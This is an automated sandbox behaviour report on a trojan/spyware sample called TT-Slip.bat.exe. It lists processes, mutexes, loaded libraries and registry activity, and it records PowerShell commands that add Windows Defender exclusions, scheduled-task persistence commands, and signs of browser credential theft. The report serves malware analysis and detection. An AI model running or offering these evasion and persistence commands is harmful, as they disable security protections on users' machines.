Classification label: mal100.troj.spyw.evad.winEXE@23/16@20/12

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

File created: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\RdISVDWoiOwlrRbmKihiw

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

File created: C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp

Jump to behavior

Source: TT-Slip.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: TT-Slip.bat.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: compact.exe, 00000011.00000003.2600882577.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000011.00000002.4514474078.0000000002CA2000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000011.00000002.4514474078.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000011.00000002.4514474078.0000000002C99000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TT-Slip.bat.exe	ReversingLabs: Detection: 50%
Source: TT-Slip.bat.exe	Virustotal: Detection: 40%

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

File read: C:\Users\user\Desktop\TT-Slip.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TT-Slip.bat.exe "C:\Users\user\Desktop\TT-Slip.bat.exe"
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT-Slip.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Users\user\Desktop\TT-Slip.bat.exe "C:\Users\user\Desktop\TT-Slip.bat.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmpBA10.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process created: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe "C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe"
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT-Slip.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Users\user\Desktop\TT-Slip.bat.exe "C:\Users\user\Desktop\TT-Slip.bat.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmpBA10.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process created: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe "C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe"	Jump to behavior
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe	Section loaded: fwpuclnt.dll

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

